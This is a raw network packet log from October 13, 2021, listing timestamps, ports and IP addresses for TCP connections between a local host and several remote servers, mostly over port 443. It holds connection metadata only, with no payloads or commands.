Oct 13, 2021 15:52:00.979598999 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.979793072 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.980026007 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.980268002 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.980314016 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.980592012 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.980700970 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.980974913 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.981013060 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.981283903 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.981385946 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.981545925 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.981580973 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.982146025 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.982248068 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.982475996 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.982523918 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.982739925 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.982995987 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.983154058 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.983163118 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.983190060 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.983437061 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.983486891 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.983680964 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.983901978 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.984056950 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.984086037 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.984340906 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.984388113 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.984575987 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.984874964 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.985043049 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.985119104 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.985157967 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.985200882 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.985348940 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.986346006 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986525059 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.986547947 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986567974 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986711979 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986728907 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.986749887 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986911058 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.986926079 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.986960888 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.987061024 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.987093925 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.987641096 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.987730980 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.987766981 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.987860918 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.987895966 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988045931 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988095045 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988126993 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988250971 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988373995 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988528967 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988600016 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988625050 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988688946 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988770008 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.988789082 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.988938093 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.989123106 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.989254951 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.989360094 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.989391088 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.989398003 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.989497900 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.993156910 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.993284941 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.993535042 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.993560076 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.993732929 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.993808985 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.993875027 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.993906021 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.994273901 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.994326115 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.994513988 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.994555950 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.994704962 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.994810104 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.994847059 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.994951010 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.994985104 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.994995117 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.995197058 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.995342016 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.995372057 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.995486021 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.995512009 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.995532036 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.995636940 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.995680094 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.995699883 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.995901108 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.996298075 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.996460915 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.996495962 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.996515989 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.996628046 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.996648073 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.996665001 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.996850014 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.996897936 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997107029 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.997143030 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997281075 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997339010 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.997363091 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997427940 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.997523069 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.997541904 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997571945 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997780085 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.997807980 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.997953892 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.998008013 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998148918 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.998177052 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998280048 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998651981 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998738050 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998825073 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998872042 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.998887062 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.998908043 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.999018908 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.999042988 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.999059916 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.999260902 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.999705076 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.999878883 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:00.999953032 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:00.999984980 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000029087 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000122070 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000164986 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000185966 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000272036 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000319958 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000339985 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000515938 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000524044 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000545979 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000653028 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000678062 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000691891 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000705004 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000848055 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.000864029 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.000880003 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001019001 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001030922 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001041889 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001058102 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001229048 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001261950 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001283884 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001389027 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001411915 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001549006 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001595974 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001616955 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001693964 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001746893 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001766920 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001910925 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.001929998 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.001945972 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002053976 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002070904 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002087116 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002233982 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002250910 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002280951 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002396107 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002415895 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002432108 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002449989 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002577066 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002593994 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002607107 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002775908 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002800941 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002811909 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002834082 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.002918005 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002929926 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002965927 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.002985001 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.003139019 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.003160954 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.003190994 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.003288984 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.003350973 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.003381968 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.003413916 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.003454924 CEST	443	49830	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:01.003587008 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:01.003619909 CEST	49830	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:03.729207039 CEST	49828	80	192.168.11.20	199.101.245.90
Oct 13, 2021 15:52:04.435647011 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.435733080 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.435967922 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.478985071 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.479002953 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.511476040 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.511637926 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.511784077 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.512780905 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.513518095 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.522339106 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.522986889 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.523165941 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.525223017 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.566032887 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.787437916 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.787647963 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.787702084 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.787818909 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.787864923 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.787976980 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.788024902 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.788140059 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.788182974 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.788264990 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.788290977 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.788425922 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.789760113 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.789822102 CEST	443	49831	172.217.168.46	192.168.11.20
Oct 13, 2021 15:52:04.789830923 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.790051937 CEST	49831	443	192.168.11.20	172.217.168.46
Oct 13, 2021 15:52:04.798386097 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.798506021 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.798731089 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.798933983 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.798975945 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.839180946 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.839373112 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.840100050 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.840361118 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.844593048 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.844604969 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.844804049 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:04.844904900 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.845263004 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:04.885930061 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.041229963 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.041423082 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.041477919 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.041680098 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.041989088 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.042498112 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.042730093 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.043958902 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.044090033 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.044158936 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.044212103 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.044332027 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.044409990 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.049263954 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.049529076 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.051773071 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.051978111 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.052026987 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.052185059 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.052233934 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.052262068 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.052364111 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.052409887 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.052434921 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.052644014 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.052705050 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.052910089 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.053273916 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.053518057 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.053575039 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.053777933 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.053894043 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.054109097 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.054152012 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.054303885 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.054538012 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.054775000 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.054833889 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.055028915 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.055105925 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.055254936 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.055288076 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.055430889 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.055546045 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.055696011 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.055726051 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.055871964 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.056282997 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.056485891 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.056540966 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.056691885 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.057099104 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.057360888 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.057420015 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.057622910 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.057746887 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.058008909 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.058063984 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.058254004 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.058525085 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.058727980 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.058784962 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.058933973 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.059024096 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.059195995 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.062712908 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.062848091 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.062866926 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.062891006 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.063039064 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.063086033 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.063452959 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.063606977 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.063641071 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.063785076 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.063812971 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.063966036 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.063997030 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.064130068 CEST	443	49832	172.217.168.33	192.168.11.20
Oct 13, 2021 15:52:05.064142942 CEST	49832	443	192.168.11.20	172.217.168.33
Oct 13, 2021 15:52:05.064168930 CEST	443	49832	172.217.168.33	192.168.11.20
